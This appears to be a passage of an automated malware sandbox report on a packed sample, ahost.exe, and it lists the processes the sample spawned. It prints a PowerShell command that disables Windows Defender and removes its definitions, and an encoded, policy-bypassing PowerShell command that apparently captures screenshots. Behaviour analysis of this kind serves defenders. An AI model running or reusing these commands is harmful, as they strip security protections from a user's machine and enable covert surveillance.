caaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8CB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,104_2_00007FF7CF8CB340
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92095E0 cpuid 0_2_00007FF7F92095E0
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeQueries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformationJump to behavior
